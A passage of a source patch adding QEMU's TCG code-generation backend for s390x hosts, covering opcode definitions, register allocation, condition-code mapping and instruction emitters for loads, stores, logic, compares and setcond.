0xb988, + RRE_CGR = 0xb920, + RRE_CLGR = 0xb921, + RRE_DLGR = 0xb987, + RRE_DLR = 0xb997, + RRE_DSGFR = 0xb91d, + RRE_DSGR = 0xb90d, + RRE_LGBR = 0xb906, + 
RRE_LCGR = 0xb903, + RRE_LGFR = 0xb914, + RRE_LGHR = 0xb907, + RRE_LGR = 0xb904, + RRE_LLGCR = 0xb984, + RRE_LLGFR = 0xb916, + RRE_LLGHR = 0xb985, + RRE_LRVR = 0xb91f, + RRE_LRVGR = 0xb90f, + RRE_LTGR = 0xb902, + RRE_MLGR = 0xb986, + RRE_MSGR = 0xb90c, + RRE_MSR = 0xb252, + RRE_NGR = 0xb980, + RRE_OGR = 0xb981, + RRE_SGR = 0xb909, + RRE_SLGR = 0xb90b, + RRE_SLBR = 0xb999, + RRE_SLBGR = 0xb989, + RRE_XGR = 0xb982, + + RRF_LOCR = 0xb9f2, + RRF_LOCGR = 0xb9e2, + + RR_AR = 0x1a, + RR_ALR = 0x1e, + RR_BASR = 0x0d, + RR_BCR = 0x07, + RR_CLR = 0x15, + RR_CR = 0x19, + RR_DR = 0x1d, + RR_LCR = 0x13, + RR_LR = 0x18, + RR_LTR = 0x12, + RR_NR = 0x14, + RR_OR = 0x16, + RR_SR = 0x1b, + RR_SLR = 0x1f, + RR_XR = 0x17, + + RSY_RLL = 0xeb1d, + RSY_RLLG = 0xeb1c, + RSY_SLLG = 0xeb0d, + RSY_SRAG = 0xeb0a, + RSY_SRLG = 0xeb0c, + + RS_SLL = 0x89, + RS_SRA = 0x8a, + RS_SRL = 0x88, + + RXY_AG = 0xe308, + RXY_AY = 0xe35a, + RXY_CG = 0xe320, + RXY_CY = 0xe359, + RXY_LAY = 0xe371, + RXY_LB = 0xe376, + RXY_LG = 0xe304, + RXY_LGB = 0xe377, + RXY_LGF = 0xe314, + RXY_LGH = 0xe315, + RXY_LHY = 0xe378, + RXY_LLGC = 0xe390, + RXY_LLGF = 0xe316, + RXY_LLGH = 0xe391, + RXY_LMG = 0xeb04, + RXY_LRV = 0xe31e, + RXY_LRVG = 0xe30f, + RXY_LRVH = 0xe31f, + RXY_LY = 0xe358, + RXY_STCY = 0xe372, + RXY_STG = 0xe324, + RXY_STHY = 0xe370, + RXY_STMG = 0xeb24, + RXY_STRV = 0xe33e, + RXY_STRVG = 0xe32f, + RXY_STRVH = 0xe33f, + RXY_STY = 0xe350, + + RX_A = 0x5a, + RX_C = 0x59, + RX_L = 0x58, + RX_LA = 0x41, + RX_LH = 0x48, + RX_ST = 0x50, + RX_STC = 0x42, + RX_STH = 0x40, +} S390Opcode; + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "%r0", "%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", + "%r8", "%r9", "%r10" "%r11" "%r12" "%r13" "%r14" "%r15" +}; +#endif + +/* Since R6 is a potential argument register, choose it last of the + call-saved registers. Likewise prefer the call-clobbered registers + in reverse order to maximize the chance of avoiding the arguments. 
*/ +static const int tcg_target_reg_alloc_order[] = { + /* Call saved registers. */ + TCG_REG_R13, + TCG_REG_R12, + TCG_REG_R11, + TCG_REG_R10, + TCG_REG_R9, + TCG_REG_R8, + TCG_REG_R7, + TCG_REG_R6, + /* Call clobbered registers. */ + TCG_REG_R14, + TCG_REG_R0, + TCG_REG_R1, + /* Argument registers, in reverse order of allocation. */ + TCG_REG_R5, + TCG_REG_R4, + TCG_REG_R3, + TCG_REG_R2, +}; + +static const int tcg_target_call_iarg_regs[] = { + TCG_REG_R2, + TCG_REG_R3, + TCG_REG_R4, + TCG_REG_R5, + TCG_REG_R6, +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_R2, +}; + +#define S390_CC_EQ 8 +#define S390_CC_LT 4 +#define S390_CC_GT 2 +#define S390_CC_OV 1 +#define S390_CC_NE (S390_CC_LT | S390_CC_GT) +#define S390_CC_LE (S390_CC_LT | S390_CC_EQ) +#define S390_CC_GE (S390_CC_GT | S390_CC_EQ) +#define S390_CC_NEVER 0 +#define S390_CC_ALWAYS 15 + +/* Condition codes that result from a COMPARE and COMPARE LOGICAL. */ +static const uint8_t tcg_cond_to_s390_cond[] = { + [TCG_COND_EQ] = S390_CC_EQ, + [TCG_COND_NE] = S390_CC_NE, + [TCG_COND_LT] = S390_CC_LT, + [TCG_COND_LE] = S390_CC_LE, + [TCG_COND_GT] = S390_CC_GT, + [TCG_COND_GE] = S390_CC_GE, + [TCG_COND_LTU] = S390_CC_LT, + [TCG_COND_LEU] = S390_CC_LE, + [TCG_COND_GTU] = S390_CC_GT, + [TCG_COND_GEU] = S390_CC_GE, +}; + +/* Condition codes that result from a LOAD AND TEST. Here, we have no + unsigned instruction variation, however since the test is vs zero we + can re-map the outcomes appropriately. 
*/ +static const uint8_t tcg_cond_to_ltr_cond[] = { + [TCG_COND_EQ] = S390_CC_EQ, + [TCG_COND_NE] = S390_CC_NE, + [TCG_COND_LT] = S390_CC_LT, + [TCG_COND_LE] = S390_CC_LE, + [TCG_COND_GT] = S390_CC_GT, + [TCG_COND_GE] = S390_CC_GE, + [TCG_COND_LTU] = S390_CC_NEVER, + [TCG_COND_LEU] = S390_CC_EQ, + [TCG_COND_GTU] = S390_CC_NE, + [TCG_COND_GEU] = S390_CC_ALWAYS, +}; + +#ifdef CONFIG_SOFTMMU +static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_SB] = helper_ret_ldsb_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LESW] = helper_le_ldsw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LESL] = helper_le_ldsl_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BESW] = helper_be_ldsw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BESL] = helper_be_ldsl_mmu, + [MO_BEQ] = helper_be_ldq_mmu, +}; + +static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, +}; +#endif + +static tcg_insn_unit *tb_ret_addr; + +/* A list of relevant facilities used by this translator. Some of these + are required for proper operation, and these are checked at startup. 
*/ + +#define FACILITY_ZARCH_ACTIVE (1ULL << (63 - 2)) +#define FACILITY_LONG_DISP (1ULL << (63 - 18)) +#define FACILITY_EXT_IMM (1ULL << (63 - 21)) +#define FACILITY_GEN_INST_EXT (1ULL << (63 - 34)) +#define FACILITY_LOAD_ON_COND (1ULL << (63 - 45)) + +static uint64_t facilities; + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + intptr_t pcrel2 = (tcg_insn_unit *)value - (code_ptr - 1); + assert(addend == -2); + + switch (type) { + case R_390_PC16DBL: + assert(pcrel2 == (int16_t)pcrel2); + tcg_patch16(code_ptr, pcrel2); + break; + case R_390_PC32DBL: + assert(pcrel2 == (int32_t)pcrel2); + tcg_patch32(code_ptr, pcrel2); + break; + default: + tcg_abort(); + break; + } +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str = *pct_str; + + switch (ct_str[0]) { + case 'r': /* all registers */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffff); + break; + case 'R': /* not R0 */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R0); + break; + case 'L': /* qemu_ld/st constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffff); + tcg_regset_reset_reg (ct->u.regs, TCG_REG_R2); + tcg_regset_reset_reg (ct->u.regs, TCG_REG_R3); + tcg_regset_reset_reg (ct->u.regs, TCG_REG_R4); + break; + case 'a': /* force R2 for division */ + ct->ct |= TCG_CT_REG; + tcg_regset_clear(ct->u.regs); + tcg_regset_set_reg(ct->u.regs, TCG_REG_R2); + break; + case 'b': /* force R3 for division */ + ct->ct |= TCG_CT_REG; + tcg_regset_clear(ct->u.regs); + tcg_regset_set_reg(ct->u.regs, TCG_REG_R3); + break; + case 'A': + ct->ct |= TCG_CT_CONST_ADLI; + break; + case 'K': + ct->ct |= TCG_CT_CONST_MULI; + break; + case 'O': + ct->ct |= TCG_CT_CONST_ORI; + break; + case 'X': + ct->ct |= TCG_CT_CONST_XORI; + break; + case 'C': + ct->ct |= TCG_CT_CONST_CMPI; + break; + 
default: + return -1; + } + ct_str++; + *pct_str = ct_str; + + return 0; +} + +/* Immediates to be used with logical OR. This is an optimization only, + since a full 64-bit immediate OR can always be performed with 4 sequential + OI[LH][LH] instructions. What we're looking for is immediates that we + can load efficiently, and the immediate load plus the reg-reg OR is + smaller than the sequential OI's. */ + +static int tcg_match_ori(TCGType type, tcg_target_long val) +{ + if (facilities & FACILITY_EXT_IMM) { + if (type == TCG_TYPE_I32) { + /* All 32-bit ORs can be performed with 1 48-bit insn. */ + return 1; + } + } + + /* Look for negative values. These are best to load with LGHI. */ + if (val < 0) { + if (val == (int16_t)val) { + return 0; + } + if (facilities & FACILITY_EXT_IMM) { + if (val == (int32_t)val) { + return 0; + } + } + } + + return 1; +} + +/* Immediates to be used with logical XOR. This is almost, but not quite, + only an optimization. XOR with immediate is only supported with the + extended-immediate facility. That said, there are a few patterns for + which it is better to load the value into a register first. */ + +static int tcg_match_xori(TCGType type, tcg_target_long val) +{ + if ((facilities & FACILITY_EXT_IMM) == 0) { + return 0; + } + + if (type == TCG_TYPE_I32) { + /* All 32-bit XORs can be performed with 1 48-bit insn. */ + return 1; + } + + /* Look for negative values. These are best to load with LGHI. */ + if (val < 0 && val == (int32_t)val) { + return 0; + } + + return 1; +} + +/* Imediates to be used with comparisons. */ + +static int tcg_match_cmpi(TCGType type, tcg_target_long val) +{ + if (facilities & FACILITY_EXT_IMM) { + /* The COMPARE IMMEDIATE instruction is available. */ + if (type == TCG_TYPE_I32) { + /* We have a 32-bit immediate and can compare against anything. */ + return 1; + } else { + /* ??? We have no insight here into whether the comparison is + signed or unsigned. 
The COMPARE IMMEDIATE insn uses a 32-bit + signed immediate, and the COMPARE LOGICAL IMMEDIATE insn uses + a 32-bit unsigned immediate. If we were to use the (semi) + obvious "val == (int32_t)val" we would be enabling unsigned + comparisons vs very large numbers. The only solution is to + take the intersection of the ranges. */ + /* ??? Another possible solution is to simply lie and allow all + constants here and force the out-of-range values into a temp + register in tgen_cmp when we have knowledge of the actual + comparison code in use. */ + return val >= 0 && val <= 0x7fffffff; + } + } else { + /* Only the LOAD AND TEST instruction is available. */ + return val == 0; + } +} + +/* Immediates to be used with add2/sub2. */ + +static int tcg_match_add2i(TCGType type, tcg_target_long val) +{ + if (facilities & FACILITY_EXT_IMM) { + if (type == TCG_TYPE_I32) { + return 1; + } else if (val >= -0xffffffffll && val <= 0xffffffffll) { + return 1; + } + } + return 0; +} + +/* Test if a constant matches the constraint. */ +static int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + + if (ct & TCG_CT_CONST) { + return 1; + } + + if (type == TCG_TYPE_I32) { + val = (int32_t)val; + } + + /* The following are mutually exclusive. */ + if (ct & TCG_CT_CONST_MULI) { + /* Immediates that may be used with multiply. If we have the + general-instruction-extensions, then we have MULTIPLY SINGLE + IMMEDIATE with a signed 32-bit, otherwise we have only + MULTIPLY HALFWORD IMMEDIATE, with a signed 16-bit. 
*/ + if (facilities & FACILITY_GEN_INST_EXT) { + return val == (int32_t)val; + } else { + return val == (int16_t)val; + } + } else if (ct & TCG_CT_CONST_ADLI) { + return tcg_match_add2i(type, val); + } else if (ct & TCG_CT_CONST_ORI) { + return tcg_match_ori(type, val); + } else if (ct & TCG_CT_CONST_XORI) { + return tcg_match_xori(type, val); + } else if (ct & TCG_CT_CONST_CMPI) { + return tcg_match_cmpi(type, val); + } + + return 0; +} + +/* Emit instructions according to the given instruction format. */ + +static void tcg_out_insn_RR(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg r2) +{ + tcg_out16(s, (op << 8) | (r1 << 4) | r2); +} + +static void tcg_out_insn_RRE(TCGContext *s, S390Opcode op, + TCGReg r1, TCGReg r2) +{ + tcg_out32(s, (op << 16) | (r1 << 4) | r2); +} + +static void tcg_out_insn_RRF(TCGContext *s, S390Opcode op, + TCGReg r1, TCGReg r2, int m3) +{ + tcg_out32(s, (op << 16) | (m3 << 12) | (r1 << 4) | r2); +} + +static void tcg_out_insn_RI(TCGContext *s, S390Opcode op, TCGReg r1, int i2) +{ + tcg_out32(s, (op << 16) | (r1 << 20) | (i2 & 0xffff)); +} + +static void tcg_out_insn_RIL(TCGContext *s, S390Opcode op, TCGReg r1, int i2) +{ + tcg_out16(s, op | (r1 << 4)); + tcg_out32(s, i2); +} + +static void tcg_out_insn_RS(TCGContext *s, S390Opcode op, TCGReg r1, + TCGReg b2, TCGReg r3, int disp) +{ + tcg_out32(s, (op << 24) | (r1 << 20) | (r3 << 16) | (b2 << 12) + | (disp & 0xfff)); +} + +static void tcg_out_insn_RSY(TCGContext *s, S390Opcode op, TCGReg r1, + TCGReg b2, TCGReg r3, int disp) +{ + tcg_out16(s, (op & 0xff00) | (r1 << 4) | r3); + tcg_out32(s, (op & 0xff) | (b2 << 28) + | ((disp & 0xfff) << 16) | ((disp & 0xff000) >> 4)); +} + +#define tcg_out_insn_RX tcg_out_insn_RS +#define tcg_out_insn_RXY tcg_out_insn_RSY + +/* Emit an opcode with "type-checking" of the format. */ +#define tcg_out_insn(S, FMT, OP, ...) 
\ + glue(tcg_out_insn_,FMT)(S, glue(glue(FMT,_),OP), ## __VA_ARGS__) + + +/* emit 64-bit shifts */ +static void tcg_out_sh64(TCGContext* s, S390Opcode op, TCGReg dest, + TCGReg src, TCGReg sh_reg, int sh_imm) +{ + tcg_out_insn_RSY(s, op, dest, sh_reg, src, sh_imm); +} + +/* emit 32-bit shifts */ +static void tcg_out_sh32(TCGContext* s, S390Opcode op, TCGReg dest, + TCGReg sh_reg, int sh_imm) +{ + tcg_out_insn_RS(s, op, dest, sh_reg, 0, sh_imm); +} + +static void tcg_out_mov(TCGContext *s, TCGType type, TCGReg dst, TCGReg src) +{ + if (src != dst) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, LR, dst, src); + } else { + tcg_out_insn(s, RRE, LGR, dst, src); + } + } +} + +/* load a register with an immediate value */ +static void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg ret, tcg_target_long sval) +{ + static const S390Opcode lli_insns[4] = { + RI_LLILL, RI_LLILH, RI_LLIHL, RI_LLIHH + }; + + tcg_target_ulong uval = sval; + int i; + + if (type == TCG_TYPE_I32) { + uval = (uint32_t)sval; + sval = (int32_t)sval; + } + + /* Try all 32-bit insns that can load it in one go. */ + if (sval >= -0x8000 && sval < 0x8000) { + tcg_out_insn(s, RI, LGHI, ret, sval); + return; + } + + for (i = 0; i < 4; i++) { + tcg_target_long mask = 0xffffull << i*16; + if ((uval & mask) == uval) { + tcg_out_insn_RI(s, lli_insns[i], ret, uval >> i*16); + return; + } + } + + /* Try all 48-bit insns that can load it in one go. */ + if (facilities & FACILITY_EXT_IMM) { + if (sval == (int32_t)sval) { + tcg_out_insn(s, RIL, LGFI, ret, sval); + return; + } + if (uval <= 0xffffffff) { + tcg_out_insn(s, RIL, LLILF, ret, uval); + return; + } + if ((uval & 0xffffffff) == 0) { + tcg_out_insn(s, RIL, LLIHF, ret, uval >> 31 >> 1); + return; + } + } + + /* Try for PC-relative address load. 
*/ + if ((sval & 1) == 0) { + ptrdiff_t off = tcg_pcrel_diff(s, (void *)sval) >> 1; + if (off == (int32_t)off) { + tcg_out_insn(s, RIL, LARL, ret, off); + return; + } + } + + /* If extended immediates are not present, then we may have to issue + several instructions to load the low 32 bits. */ + if (!(facilities & FACILITY_EXT_IMM)) { + /* A 32-bit unsigned value can be loaded in 2 insns. And given + that the lli_insns loop above did not succeed, we know that + both insns are required. */ + if (uval <= 0xffffffff) { + tcg_out_insn(s, RI, LLILL, ret, uval); + tcg_out_insn(s, RI, IILH, ret, uval >> 16); + return; + } + + /* If all high bits are set, the value can be loaded in 2 or 3 insns. + We first want to make sure that all the high bits get set. With + luck the low 16-bits can be considered negative to perform that for + free, otherwise we load an explicit -1. */ + if (sval >> 31 >> 1 == -1) { + if (uval & 0x8000) { + tcg_out_insn(s, RI, LGHI, ret, uval); + } else { + tcg_out_insn(s, RI, LGHI, ret, -1); + tcg_out_insn(s, RI, IILL, ret, uval); + } + tcg_out_insn(s, RI, IILH, ret, uval >> 16); + return; + } + } + + /* If we get here, both the high and low parts have non-zero bits. */ + + /* Recurse to load the lower 32-bits. */ + tcg_out_movi(s, TCG_TYPE_I64, ret, uval & 0xffffffff); + + /* Insert data into the high 32-bits. */ + uval = uval >> 31 >> 1; + if (facilities & FACILITY_EXT_IMM) { + if (uval < 0x10000) { + tcg_out_insn(s, RI, IIHL, ret, uval); + } else if ((uval & 0xffff) == 0) { + tcg_out_insn(s, RI, IIHH, ret, uval >> 16); + } else { + tcg_out_insn(s, RIL, IIHF, ret, uval); + } + } else { + if (uval & 0xffff) { + tcg_out_insn(s, RI, IIHL, ret, uval); + } + if (uval & 0xffff0000) { + tcg_out_insn(s, RI, IIHH, ret, uval >> 16); + } + } +} + + +/* Emit a load/store type instruction. Inputs are: + DATA: The register to be loaded or stored. + BASE+OFS: The effective address. + OPC_RX: If the operation has an RX format opcode (e.g. STC), otherwise 0. 
+ OPC_RXY: The RXY format opcode for the operation (e.g. STCY). */ + +static void tcg_out_mem(TCGContext *s, S390Opcode opc_rx, S390Opcode opc_rxy, + TCGReg data, TCGReg base, TCGReg index, + tcg_target_long ofs) +{ + if (ofs < -0x80000 || ofs >= 0x80000) { + /* Combine the low 20 bits of the offset with the actual load insn; + the high 44 bits must come from an immediate load. */ + tcg_target_long low = ((ofs & 0xfffff) ^ 0x80000) - 0x80000; + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, ofs - low); + ofs = low; + + /* If we were already given an index register, add it in. */ + if (index != TCG_REG_NONE) { + tcg_out_insn(s, RRE, AGR, TCG_TMP0, index); + } + index = TCG_TMP0; + } + + if (opc_rx && ofs >= 0 && ofs < 0x1000) { + tcg_out_insn_RX(s, opc_rx, data, base, index, ofs); + } else { + tcg_out_insn_RXY(s, opc_rxy, data, base, index, ofs); + } +} + + +/* load data without address translation or endianness conversion */ +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg data, + TCGReg base, intptr_t ofs) +{ + if (type == TCG_TYPE_I32) { + tcg_out_mem(s, RX_L, RXY_LY, data, base, TCG_REG_NONE, ofs); + } else { + tcg_out_mem(s, 0, RXY_LG, data, base, TCG_REG_NONE, ofs); + } +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg data, + TCGReg base, intptr_t ofs) +{ + if (type == TCG_TYPE_I32) { + tcg_out_mem(s, RX_ST, RXY_STY, data, base, TCG_REG_NONE, ofs); + } else { + tcg_out_mem(s, 0, RXY_STG, data, base, TCG_REG_NONE, ofs); + } +} + +/* load data from an absolute host address */ +static void tcg_out_ld_abs(TCGContext *s, TCGType type, TCGReg dest, void *abs) +{ + intptr_t addr = (intptr_t)abs; + + if ((facilities & FACILITY_GEN_INST_EXT) && !(addr & 1)) { + ptrdiff_t disp = tcg_pcrel_diff(s, abs) >> 1; + if (disp == (int32_t)disp) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RIL, LRL, dest, disp); + } else { + tcg_out_insn(s, RIL, LGRL, dest, disp); + } + return; + } + } + + tcg_out_movi(s, TCG_TYPE_PTR, dest, addr & ~0xffff); 
+ tcg_out_ld(s, type, dest, dest, addr & 0xffff); +} + +static inline void tcg_out_risbg(TCGContext *s, TCGReg dest, TCGReg src, + int msb, int lsb, int ofs, int z) +{ + /* Format RIE-f */ + tcg_out16(s, (RIE_RISBG & 0xff00) | (dest << 4) | src); + tcg_out16(s, (msb << 8) | (z << 7) | lsb); + tcg_out16(s, (ofs << 8) | (RIE_RISBG & 0xff)); +} + +static void tgen_ext8s(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) +{ + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RRE, LGBR, dest, src); + return; + } + + if (type == TCG_TYPE_I32) { + if (dest == src) { + tcg_out_sh32(s, RS_SLL, dest, TCG_REG_NONE, 24); + } else { + tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 24); + } + tcg_out_sh32(s, RS_SRA, dest, TCG_REG_NONE, 24); + } else { + tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 56); + tcg_out_sh64(s, RSY_SRAG, dest, dest, TCG_REG_NONE, 56); + } +} + +static void tgen_ext8u(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) +{ + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RRE, LLGCR, dest, src); + return; + } + + if (dest == src) { + tcg_out_movi(s, type, TCG_TMP0, 0xff); + src = TCG_TMP0; + } else { + tcg_out_movi(s, type, dest, 0xff); + } + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, NR, dest, src); + } else { + tcg_out_insn(s, RRE, NGR, dest, src); + } +} + +static void tgen_ext16s(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) +{ + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RRE, LGHR, dest, src); + return; + } + + if (type == TCG_TYPE_I32) { + if (dest == src) { + tcg_out_sh32(s, RS_SLL, dest, TCG_REG_NONE, 16); + } else { + tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 16); + } + tcg_out_sh32(s, RS_SRA, dest, TCG_REG_NONE, 16); + } else { + tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 48); + tcg_out_sh64(s, RSY_SRAG, dest, dest, TCG_REG_NONE, 48); + } +} + +static void tgen_ext16u(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) +{ + if (facilities & FACILITY_EXT_IMM) { + 
tcg_out_insn(s, RRE, LLGHR, dest, src); + return; + } + + if (dest == src) { + tcg_out_movi(s, type, TCG_TMP0, 0xffff); + src = TCG_TMP0; + } else { + tcg_out_movi(s, type, dest, 0xffff); + } + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, NR, dest, src); + } else { + tcg_out_insn(s, RRE, NGR, dest, src); + } +} + +static inline void tgen_ext32s(TCGContext *s, TCGReg dest, TCGReg src) +{ + tcg_out_insn(s, RRE, LGFR, dest, src); +} + +static inline void tgen_ext32u(TCGContext *s, TCGReg dest, TCGReg src) +{ + tcg_out_insn(s, RRE, LLGFR, dest, src); +} + +/* Accept bit patterns like these: + 0....01....1 + 1....10....0 + 1..10..01..1 + 0..01..10..0 + Copied from gcc sources. */ +static inline bool risbg_mask(uint64_t c) +{ + uint64_t lsb; + /* We don't change the number of transitions by inverting, + so make sure we start with the LSB zero. */ + if (c & 1) { + c = ~c; + } + /* Reject all zeros or all ones. */ + if (c == 0) { + return false; + } + /* Find the first transition. */ + lsb = c & -c; + /* Invert to look for a second transition. */ + c = ~c; + /* Erase the first transition. */ + c &= -lsb; + /* Find the second transition, if any. */ + lsb = c & -c; + /* Match if all the bits are 1's, or if c is zero. */ + return c == -lsb; +} + +static void tgen_andi_risbg(TCGContext *s, TCGReg out, TCGReg in, uint64_t val) +{ + int msb, lsb; + if ((val & 0x8000000000000001ull) == 0x8000000000000001ull) { + /* Achieve wraparound by swapping msb and lsb. */ + msb = 64 - ctz64(~val); + lsb = clz64(~val) - 1; + } else { + msb = clz64(val); + lsb = 63 - ctz64(val); + } + tcg_out_risbg(s, out, in, msb, lsb, 0, 1); +} + +static void tgen_andi(TCGContext *s, TCGType type, TCGReg dest, uint64_t val) +{ + static const S390Opcode ni_insns[4] = { + RI_NILL, RI_NILH, RI_NIHL, RI_NIHH + }; + static const S390Opcode nif_insns[2] = { + RIL_NILF, RIL_NIHF + }; + uint64_t valid = (type == TCG_TYPE_I32 ? 0xffffffffull : -1ull); + int i; + + /* Look for the zero-extensions. 
*/ + if ((val & valid) == 0xffffffff) { + tgen_ext32u(s, dest, dest); + return; + } + if (facilities & FACILITY_EXT_IMM) { + if ((val & valid) == 0xff) { + tgen_ext8u(s, TCG_TYPE_I64, dest, dest); + return; + } + if ((val & valid) == 0xffff) { + tgen_ext16u(s, TCG_TYPE_I64, dest, dest); + return; + } + } + + /* Try all 32-bit insns that can perform it in one go. */ + for (i = 0; i < 4; i++) { + tcg_target_ulong mask = ~(0xffffull << i*16); + if (((val | ~valid) & mask) == mask) { + tcg_out_insn_RI(s, ni_insns[i], dest, val >> i*16); + return; + } + } + + /* Try all 48-bit insns that can perform it in one go. */ + if (facilities & FACILITY_EXT_IMM) { + for (i = 0; i < 2; i++) { + tcg_target_ulong mask = ~(0xffffffffull << i*32); + if (((val | ~valid) & mask) == mask) { + tcg_out_insn_RIL(s, nif_insns[i], dest, val >> i*32); + return; + } + } + } + if ((facilities & FACILITY_GEN_INST_EXT) && risbg_mask(val)) { + tgen_andi_risbg(s, dest, dest, val); + return; + } + + /* Fall back to loading the constant. */ + tcg_out_movi(s, type, TCG_TMP0, val); + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, NR, dest, TCG_TMP0); + } else { + tcg_out_insn(s, RRE, NGR, dest, TCG_TMP0); + } +} + +static void tgen64_ori(TCGContext *s, TCGReg dest, tcg_target_ulong val) +{ + static const S390Opcode oi_insns[4] = { + RI_OILL, RI_OILH, RI_OIHL, RI_OIHH + }; + static const S390Opcode nif_insns[2] = { + RIL_OILF, RIL_OIHF + }; + + int i; + + /* Look for no-op. */ + if (val == 0) { + return; + } + + if (facilities & FACILITY_EXT_IMM) { + /* Try all 32-bit insns that can perform it in one go. */ + for (i = 0; i < 4; i++) { + tcg_target_ulong mask = (0xffffull << i*16); + if ((val & mask) != 0 && (val & ~mask) == 0) { + tcg_out_insn_RI(s, oi_insns[i], dest, val >> i*16); + return; + } + } + + /* Try all 48-bit insns that can perform it in one go. 
*/ + for (i = 0; i < 2; i++) { + tcg_target_ulong mask = (0xffffffffull << i*32); + if ((val & mask) != 0 && (val & ~mask) == 0) { + tcg_out_insn_RIL(s, nif_insns[i], dest, val >> i*32); + return; + } + } + + /* Perform the OR via sequential modifications to the high and + low parts. Do this via recursion to handle 16-bit vs 32-bit + masks in each half. */ + tgen64_ori(s, dest, val & 0x00000000ffffffffull); + tgen64_ori(s, dest, val & 0xffffffff00000000ull); + } else { + /* With no extended-immediate facility, we don't need to be so + clever. Just iterate over the insns and mask in the constant. */ + for (i = 0; i < 4; i++) { + tcg_target_ulong mask = (0xffffull << i*16); + if ((val & mask) != 0) { + tcg_out_insn_RI(s, oi_insns[i], dest, val >> i*16); + } + } + } +} + +static void tgen64_xori(TCGContext *s, TCGReg dest, tcg_target_ulong val) +{ + /* Perform the xor by parts. */ + if (val & 0xffffffff) { + tcg_out_insn(s, RIL, XILF, dest, val); + } + if (val > 0xffffffff) { + tcg_out_insn(s, RIL, XIHF, dest, val >> 31 >> 1); + } +} + +static int tgen_cmp(TCGContext *s, TCGType type, TCGCond c, TCGReg r1, + TCGArg c2, int c2const) +{ + bool is_unsigned = is_unsigned_cond(c); + if (c2const) { + if (c2 == 0) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, LTR, r1, r1); + } else { + tcg_out_insn(s, RRE, LTGR, r1, r1); + } + return tcg_cond_to_ltr_cond[c]; + } else { + if (is_unsigned) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RIL, CLFI, r1, c2); + } else { + tcg_out_insn(s, RIL, CLGFI, r1, c2); + } + } else { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RIL, CFI, r1, c2); + } else { + tcg_out_insn(s, RIL, CGFI, r1, c2); + } + } + } + } else { + if (is_unsigned) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, CLR, r1, c2); + } else { + tcg_out_insn(s, RRE, CLGR, r1, c2); + } + } else { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, CR, r1, c2); + } else { + tcg_out_insn(s, RRE, CGR, r1, c2); + } + } + } + return tcg_cond_to_s390_cond[c]; +} + 
+static void tgen_setcond(TCGContext *s, TCGType type, TCGCond cond, + TCGReg dest, TCGReg c1, TCGArg c2, int c2const) +{ + int cc; + + switch (cond) { + case TCG_COND_GTU: + case TCG_COND_GT: + do_greater: + /* The result of a compare has CC=2 for GT and CC=3 unused. + ADD LOGICAL WITH CARRY considers (CC & 2) the carry bit. */ + tgen_cmp(s, type, cond, c1, c2, c2const); + tcg_out_movi(s, type, dest, 0); + tcg_out_insn(s, RRE, ALCGR, dest, dest); + return; + + case TCG_COND_GEU: + do_geu: + /* We need "real" carry semantics, so use SUBTRACT LOGICAL + instead of COMPARE LOGICAL. This needs an extra move. */ + tcg_out_mov(s, type, TCG_TMP0, c1); + if (c2const) { + tcg_out_movi(s, TCG_TYPE_I64, dest, 0); + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RIL, SLFI, TCG_TMP0, c2); + } else { + tcg_out_insn(s, RIL, SLGFI, TCG_TMP0, c2); + } + } else { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, SLR, TCG_TMP0, c2); + } else { + tcg_out_insn(s, RRE, SLGR, 